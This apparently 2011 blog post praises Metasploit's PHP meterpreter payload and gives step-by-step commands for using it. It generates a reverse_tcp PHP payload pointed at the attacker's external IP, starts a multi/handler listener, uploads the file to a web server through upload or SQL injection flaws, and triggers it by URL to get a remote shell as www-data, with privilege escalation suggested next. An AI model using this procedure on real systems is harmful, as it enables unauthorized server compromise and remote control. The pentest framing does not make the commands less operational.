Thursday, February 24, 2011

Ode to PHP meterpreter payload

The reason why I am writing this post is because I want to give credit to this incredible piece of code that made my life easy in on of my pentests. So, here we go...

The meterpreter payload is one of the most popular payloads in the metasploit framework. There are many reasons for that but the main one is that it will allow you to run specific commands in the compromised server without actually running a shell which is incredibly easy to detect by a sysadmin. This payload was created, as far as I know, by the Carlos Perez or darkoperator which on top of that has created a number of scripts to escalate privileges, modify the operating system services or even maintain a persistent metepreter connection. Although this payload has been out there for a long time a great way of taking advantage of it is by using it in its php form (created by Egypt). This is because usually when you attack web sites or servers from the Internet it is uncommon to identify open service with exploitable vulnerabilities. Usually, the ports on Internet servers will be filtered or blocked by a Firewall which makes the exploitation harder from the outside. This is when the meterpreter in its PHP form comes in. It is a lot more common to find web applications that allowed registered users to upload files or exploit SQL injections that will allow you to upload a file in the /tmp folder or in the /images folder. This is incredibly dangerous for if identified in any web external server even if you don't use the meterpreter payload. However, this payload will make your life so much easier! Here is how to run it.

Create the payload using your external IP address:

msfplayload php/meterpreter/reverse_tcp LHOST=MY_EXTERNAL_IP LPORT=4444 R > my_m3t3rpr3t3r.php

Start the msfconsole and start the multi/handler to receive connections to your computer. If you have an internal firewall in your machine you will have to allow incoming connections to your previously defined port, in this case 4444.

msf >use multi/handler
msf >set PAYLOAD php/meterpreter/reverse_tcp
msf >set LHOST MY_EXTERNAL_IP
msf >set LPORT 4444
msf >exploit -z -j

Now, just upload the file my_m3t3rpr3t3r.php to a folder that you can reach from the internet. Usually you can put it in /var/www/images/. After that your go to your target server and excecute the payload as follows (asssuming that you uploaded the file to the images folder):

http://MY_TARGET.com/images/my_m3t3rpr3t3r.php

If everything works as expected you should receive a connection back to your computer that will allow you to execute commands in the server as a non-privileged user (e.g. www-data). After that you can try to escalate privileges with a local exploit or using any other trick that you know.

Again, I hope this helps someone.

P.D. Thanks again to the metasploit team for sharing this!

c4an.